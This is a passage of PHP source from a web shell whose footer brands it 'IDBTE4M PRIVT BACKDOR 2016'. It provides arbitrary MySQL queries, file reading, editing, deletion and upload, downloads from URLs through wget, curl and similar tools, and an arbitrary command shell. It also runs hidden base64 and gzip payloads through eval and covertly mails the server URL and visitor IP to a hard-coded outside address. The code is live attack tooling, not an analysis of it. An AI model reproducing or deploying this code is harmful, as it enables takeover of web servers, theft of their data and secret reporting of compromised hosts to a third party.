4129 if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
4130 for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){
4131 if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) {
4132 if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
4133 $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?>
4134 <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
4135 <input type="hidden" name="x" value="mysql" />
4136 <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
4137 <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
4138 <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
4139 <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
4140 <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form>
4141 <?php }}
4142 elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
4143 elseif(isset($_GET['idb']) && ($_GET['idb'] == 'jump')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; }
4144 elseif(isset($_GET['idb']) && ($_GET['idb'] == 'wpp')){ @eval(gzinflate(base64_decode($wpress))); "</div>"; }
4145
4146 elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> ";
4147 if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time());
4148 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
4149 <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
4150 <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content">
4151 <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
4152 <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']);
4153 $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
4154 <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
4155 <table class="tabnet" style="width:320px;padding:0 1px;">
4156 <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr>
4157 <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
4158 <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
4159 <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
4160 <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table>
4161 <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
4162 <?php if(isset($_GET['idb']) && ($_GET['idb'] == '?')){ @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $tujuanmail = 'kefiex403@gmail.com'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); }?>
4163 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
4164 <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
4165 <p><center><div class="info">-=[ IDBTE4M PRIVT BACKDOR 2016 ]=- <span class="gaya"><a href="http://fb.com/idbte4m"></a></span></div>